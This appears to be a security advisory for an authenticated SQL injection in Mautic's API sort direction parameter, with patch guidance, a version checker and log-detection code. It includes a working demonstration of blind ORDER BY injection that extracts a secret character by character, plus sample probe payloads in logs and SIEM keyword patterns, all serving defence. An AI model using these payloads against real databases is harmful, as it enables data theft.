CVE-2026-3105

7.6 HIGH

📋 TL;DR

An SQL injection in a Mautic API endpoint lets an authenticated API user inject arbitrary SQL through the sort direction parameter, which reaches the database query without being restricted to ASC or DESC. An attacker holding valid API credentials could read, modify, or delete database contents. Unauthenticated requests cannot reach the flaw.

💻 Affected Systems

Products:
  • Mautic
Versions: 4.x before 4.4.19, 5.x before 5.2.10, 6.x before 6.0.8, 7.x before 7.0.1
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Requires authenticated access to the API endpoint

📦 What is this software?

Mautic is an open-source marketing automation platform. Its REST API exposes contacts, segments, campaigns and the per-contact activity history; the affected sort direction parameter belongs to that API.

⚠️ Risk & Real-World Impact

🔴 Worst Case: Complete database compromise, including exfiltration, manipulation, or deletion of critical data (the application's own database user typically has full rights on every Mautic table)

🟠 Likely Case: Unauthorized read access to contact and configuration data, with potential privilege escalation if user or role tables can be modified

🟢 If Mitigated: With the patch applied, or the sort direction restricted to an allow-list of ASC/DESC, the parameter can no longer alter the query and the exposure is reduced to the normal authenticated API surface

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires authenticated access and knowledge of SQL injection techniques

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 4.4.19, 5.2.10, 6.0.8, 7.0.1 or later

Vendor Advisory: https://github.com/mautic/mautic/security/advisories/GHSA-r5j5-q42h-fc93

Restart Required: Yes

Instructions:

1. Back up the Mautic installation and database.
2. Update to the patched release for your branch (4.4.19, 5.2.10, 6.0.8 or 7.0.1) using your preferred method (composer, manual download, etc.).
3. Clear the application cache and restart PHP-FPM or the web server so no stale code remains loaded.
4. Verify the running version and confirm that the API endpoint still behaves as expected for legitimate ASC/DESC sort directions.

🔧 Temporary Workarounds

No official workarounds (applies to all affected branches). The vendor advisory states that no workarounds are available; the fix is to update.

🧯 If You Can't Patch

  • Restrict the sort direction parameter to the two tokens ASC and DESC (an allow-list; an ORDER BY direction cannot be passed as a bound query parameter, so escaping alone does not help)
  • Disable the REST API if it is not needed, or limit API credentials to trusted integrations and rotate them if misuse is suspected
  • Apply web application firewall rules for SQL injection patterns as a stopgap only; ORDER BY payloads need not contain SELECT or UNION, so generic signatures are easy to bypass
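Why the allow-list is the right control, shown as an added example that is not Mautic's code: a sort direction spliced into ORDER BY cannot be protected by bind parameters, and whoever controls that slot can pull unrelated data out of the database one comparison at a time. The schema, table names and the secret below are constructed for the demonstration; the vulnerable and hardened functions differ only in whether the value is checked before it reaches the SQL string.

```python
"""Sort-direction injection vs. allow-listing (added illustration, not Mautic code).
Schema, table names and the secret are constructed for this example."""
import sqlite3
import string
from typing import List, Optional

ALLOWED_DIRECTIONS = {"ASC", "DESC"}
ALPHABET = string.ascii_lowercase + string.digits + "-"


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a listing table plus a table the caller must never read."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE contacts (id INTEGER PRIMARY KEY, email TEXT);
        INSERT INTO contacts VALUES
            (1, 'alice@example.test'), (2, 'bob@example.test'), (3, 'carol@example.test');
        CREATE TABLE api_keys (id INTEGER PRIMARY KEY, secret TEXT);
        INSERT INTO api_keys VALUES (1, 'k3y-s3cr3t');
        """
    )
    return conn


def list_contacts_vulnerable(conn: sqlite3.Connection, direction: str) -> List[str]:
    """Vulnerable pattern: the caller-supplied direction is spliced into ORDER BY.
    A bind parameter cannot carry ASC/DESC, so code often interpolates it unchecked."""
    sql = f"SELECT email FROM contacts ORDER BY id {direction}"
    return [row[0] for row in conn.execute(sql)]


def normalize_direction(direction: str) -> Optional[str]:
    """Allow-list check: returns 'ASC' or 'DESC', or None for anything else."""
    candidate = direction.strip().upper()
    return candidate if candidate in ALLOWED_DIRECTIONS else None


def list_contacts_fixed(conn: sqlite3.Connection, direction: str) -> List[str]:
    """Hardened pattern: only the two allow-listed tokens ever reach the SQL string."""
    safe = normalize_direction(direction)
    if safe is None:
        raise ValueError(f"invalid sort direction: {direction!r}")
    sql = f"SELECT email FROM contacts ORDER BY id {safe}"
    return [row[0] for row in conn.execute(sql)]


def direction_payload(position: int, guess: str) -> str:
    """Boolean-based payload for the direction slot. 'id * 0' neutralises the real
    sort key; the CASE then orders ascending if the guess is right, descending if not."""
    return (
        f"* 0, CASE WHEN (SELECT substr(secret, {position}, 1) FROM api_keys WHERE id = 1)"
        f" = '{guess}' THEN id ELSE -id END"
    )


def recover_secret(conn: sqlite3.Connection, length: int) -> str:
    """Reads the secret through the vulnerable listing, one character per guess,
    by observing which contact comes back first."""
    recovered = ""
    for position in range(1, length + 1):
        for guess in ALPHABET:
            rows = list_contacts_vulnerable(conn, direction_payload(position, guess))
            if rows[0] == "alice@example.test":  # ascending order => condition was true
                recovered += guess
                break
        else:
            raise RuntimeError(f"no match at position {position}")
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("legitimate DESC:", list_contacts_vulnerable(db, "DESC"))
    print("leaked through ORDER BY:", recover_secret(db, 10))
    print("hardened accepts:", normalize_direction(" desc "))
    print("hardened rejects:", normalize_direction(direction_payload(1, "k")))
```

The payload never contains SELECT at the start, UNION or a comment sequence, which is why keyword-based WAF rules are weak here; the only robust control is that `normalize_direction` refuses everything except the two tokens.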

🔍 How to Verify

Check if Vulnerable:

Compare your Mautic version with the fixed release for its branch: 4.x below 4.4.19, 5.x below 5.2.10, 6.x below 6.0.8, or 7.x below 7.0.1 is vulnerable. Pre-release builds of a fixed version (for example a 5.2.10 release candidate) predate the fix.

Check Version:

Read the version from the Mautic admin dashboard, or from the version constants in app/AppKernel.php (newer release lines keep the version in app/version.txt instead)

Verify Fix Applied:

Confirm the running version is at or above the fixed release for its branch (4.4.19, 5.2.10, 6.0.8 or 7.0.1) after the cache has been cleared, so the reported version reflects the code actually being served
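A branch-aware check of the version string, as an added example (not a Mautic tool): it maps the major version to the fixed release listed above, treats pre-release suffixes as older than the final release, and reports lines that have no fixed release at all instead of silently passing them. Feed it the version shown in the admin dashboard; the version-string format it accepts is an assumption.

```python
"""Branch-aware version check for the fixed releases listed above (added example,
not a Mautic tool). Input is the version string shown in the admin dashboard."""
import re
from typing import Optional, Tuple

# Earliest fixed release per major line, from the advisory summary.
FIXED_BY_MAJOR = {4: (4, 4, 19), 5: (5, 2, 10), 6: (6, 0, 8), 7: (7, 0, 1)}

# Assumed format: optional 'v', three numeric components, optional pre-release suffix.
VERSION = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:[-+.]?([0-9A-Za-z.-]+))?$")


def parse_version(text: str) -> Tuple[int, int, int, bool]:
    """Returns (major, minor, patch, is_final). A pre-release such as 5.2.10-rc1
    sorts before the final 5.2.10 and therefore does not carry the fix."""
    m = VERSION.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    major, minor, patch, suffix = m.groups()
    return int(major), int(minor), int(patch), suffix is None


def assess(version: str) -> Tuple[str, Optional[str]]:
    """Returns (status, fixed_release). status is 'patched', 'vulnerable', or
    'unsupported' for a major line with no fixed release listed (e.g. 3.x)."""
    major, minor, patch, is_final = parse_version(version)
    fixed = FIXED_BY_MAJOR.get(major)
    if fixed is None:
        return "unsupported", None
    fixed_str = ".".join(map(str, fixed))
    # Final releases compare as True > False, so 5.2.10-rc1 sorts below 5.2.10.
    if (major, minor, patch, is_final) >= (*fixed, True):
        return "patched", fixed_str
    return "vulnerable", fixed_str


if __name__ == "__main__":
    for sample in ["4.4.18", "4.4.19", "5.2.10-rc1", "v6.1.0", "7.0.1", "3.3.5"]:
        status, fixed = assess(sample)
        print(f"{sample:12} {status:12} fixed release: {fixed or 'none for this line'}")
```

For a fleet, run `assess` over the versions your inventory reports and treat both `vulnerable` and `unsupported` as work items: an unsupported line has no fix to move to and needs a branch upgrade.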

📡 Detection & Monitoring

Log Indicators:

  • Queries in the database general or slow log whose ORDER BY clause contains anything other than a column and ASC/DESC (CASE WHEN, subselects, sleep or benchmark functions, comment sequences)
  • Failed API authentication attempts followed by a burst of API calls from the same source (credential compromise preceding exploitation)
  • API requests to the contact activity endpoints whose sort or direction parameter is not ASC or DESC

Network Indicators:

  • Unusual volumes or timing of requests to the contact activity endpoints from a single API identity (blind extraction needs many near-identical requests)
  • Sort or direction parameters carrying SQL keywords, parentheses, commas or comment sequences instead of ASC/DESC

SIEM Query:

source="web_server" AND (uri="*api/contacts/*/activity*" OR uri="*api/contact/*/activity*") AND (query="*UNION*" OR query="*SELECT*" OR query="*CASE WHEN*" OR query="*SLEEP(*" OR query="*BENCHMARK(*" OR query="*IF(*" OR query="*--*")

Because the injection point is the direction slot of an existing ORDER BY, a payload need not contain ORDER BY, SELECT or UNION; conditional (CASE WHEN, IF) and timing (SLEEP, BENCHMARK) primitives are the more reliable keywords. Decode URL encoding (%20, %28, %2C) before matching, expect false positives from legitimate search strings, and where the pipeline allows it, alert on any sort or direction parameter whose decoded value is not exactly ASC or DESC.
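The same detection as runnable logic over access-log lines, added here as an example and not taken from the advisory: it parses combined-format log lines, keeps only requests to the contact activity endpoints named above, and flags a request when a sort-like parameter holds anything other than ASC/DESC or a bare column name, or when any parameter value contains an SQL primitive. The log lines are constructed, and the parameter-name heuristic (anything containing order, sort or dir) is an assumption rather than Mautic's documented parameter list.

```python
"""Detection over web-server access logs (added example, not from the advisory).
Log lines are constructed; the parameter names checked are a heuristic, not
Mautic's documented API parameters."""
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Combined log format: client, ident, user, [timestamp], "METHOD URI PROTO", status, ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
# The contact activity endpoints named in the advisory summary.
ACTIVITY_PATH = re.compile(r"^/api/contacts?/\d+/activity/?$")
# Parameters likely to carry a sort column or direction (assumed names; they vary by version).
SORT_PARAM = re.compile(r"(order|sort|dir)", re.I)
# A legitimate sort value is a direction token or a bare column identifier.
IDENTIFIER = re.compile(r"^[A-Za-z_][\w.]*$")
# ORDER BY injection rarely needs SELECT/UNION; conditional and timing primitives are typical.
SQL_PRIMITIVE = re.compile(
    r"\bUNION\b|\bSELECT\b|\bCASE\s+WHEN\b|\bSLEEP\s*\(|\bBENCHMARK\s*\(|\bIF\s*\(|--|/\*", re.I
)


def inspect_request(uri: str) -> List[str]:
    """Returns the rules a single request triggers (empty list if benign or out of scope)."""
    parts = urlsplit(uri)
    if not ACTIVITY_PATH.match(parts.path):
        return []
    reasons: List[str] = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            stripped = value.strip()
            if (
                SORT_PARAM.search(name)
                and stripped
                and stripped.upper() not in ("ASC", "DESC")
                and not IDENTIFIER.match(stripped)
            ):
                reasons.append(f"sort parameter {name!r} is not ASC/DESC or a column name")
            if SQL_PRIMITIVE.search(value):
                reasons.append(f"SQL primitive in parameter {name!r}")
    return reasons


def scan_log(text: str) -> List[Dict[str, object]]:
    """Parses access-log text and returns one finding per suspicious request."""
    findings: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        reasons = inspect_request(m["uri"])
        if reasons:
            findings.append({"ip": m["ip"], "ts": m["ts"], "uri": m["uri"], "reasons": reasons})
    return findings


# Constructed sample: two benign requests and two probes against the activity endpoint.
SAMPLE_LOG = """\
10.0.0.5 - apiuser [01/Mar/2026:10:00:01 +0000] "GET /api/contacts/42/activity?order%5B0%5D=timestamp&order%5B1%5D=DESC HTTP/1.1" 200 512 "-" "curl/8.5.0"
10.0.0.5 - apiuser [01/Mar/2026:10:00:03 +0000] "GET /api/contacts?search=select%20list HTTP/1.1" 200 2048 "-" "curl/8.5.0"
10.0.0.9 - apiuser [01/Mar/2026:10:00:07 +0000] "GET /api/contacts/42/activity?order%5B0%5D=timestamp&order%5B1%5D=DESC%2C%20CASE%20WHEN%20(SELECT%20substr(secret%2C1%2C1)%20FROM%20api_keys)%3D%27k%27%20THEN%20id%20END HTTP/1.1" 200 512 "-" "python-requests/2.31"
10.0.0.9 - apiuser [01/Mar/2026:10:00:09 +0000] "GET /api/contacts/42/activity?orderDir=ASC%2C(SELECT%20SLEEP(5)) HTTP/1.1" 200 512 "-" "python-requests/2.31"
"""

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ts"], finding["ip"], finding["uri"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

The second sample line shows why the page's keyword-only query needs the path restriction: a legitimate search term containing "select" on a different endpoint is ignored, while the two probes from 10.0.0.9 are reported with both the direction-allow-list rule and the SQL-primitive rule.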

🔗 References

  • Vendor advisory GHSA-r5j5-q42h-fc93: https://github.com/mautic/mautic/security/advisories/GHSA-r5j5-q42h-fc93